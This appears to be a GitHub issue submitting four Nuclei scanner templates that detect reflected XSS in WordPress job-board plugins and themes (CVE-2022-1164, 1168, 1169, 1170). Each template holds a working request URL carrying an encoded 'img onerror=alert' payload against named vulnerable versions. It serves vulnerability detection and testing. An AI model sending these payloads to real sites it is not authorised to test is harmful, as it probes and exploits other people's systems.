### ISSUE TITLE
Multiples XSS CVE-2022-1164 CVE-2022-1168 CVE-2022-1169 CVE-2022-1170

### ISSUE THREAD

**Issue by Akincibor** [projectdiscovery/nuclei-templates#4088]
CVE-2022-1164

```yaml
id: CVE-2022-1164

info:
  name: Wyzi - XSS
  author: Akincibor
  severity: medium
  description: Wyzi < 2.4.3 - Reflected Cross-Site Scripting (XSS)
  reference: https://wpscan.com/vulnerability/157a9a76-3e5f-4d27-aefc-cb9cb88b3286
  tags: xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/business/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3Easd&wyz-loc-filter-txt=&loc-filter-txt=&loc-filter-lat=&loc-filter-lng=&category=&radius=0'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<img src=x onerror=alert(/XSS/)>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header
```

CVE-2022-1168

```yaml
id: CVE-2022-1168

info:
  name: Wyzi - XSS
  author: Akincibor
  severity: medium
  description: JobSearch < 1.5.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
  reference: https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490
  tags: xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3E&ajax_filter=true&posted=all&sort-by=recent'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<img src=x onerror=alert(1)>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header
```

CVE-2022-1169

```yaml
id: CVE-2022-1169

info:
  name: Careerfy - XSS
  author: Akincibor
  severity: medium
  description: Careerfy < 3.9.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)
  reference: https://wpscan.com/vulnerability/f3a1dcad-528a-4ecc-ac8e-728caa7c9878
  tags: xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/jobs-listing/?search_title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&location=&loc_radius=50&sector_cat='
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<img src=x onerror=alert(1)>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header
```

CVE-2022-1170

```yaml
id: CVE-2022-1170

info:
  name: JobMonster - XSS
  author: Akincibor
  severity: medium
  description: JobMonster < 4.5.2.9 - Unauthenticated Reflected Cross-Site Scripting
  reference: https://wpscan.com/vulnerability/2ecb18e6-b575-4a20-bd31-94d24f1d1efc
  tags: xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<img src=x onerror=alert(1)>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header
```
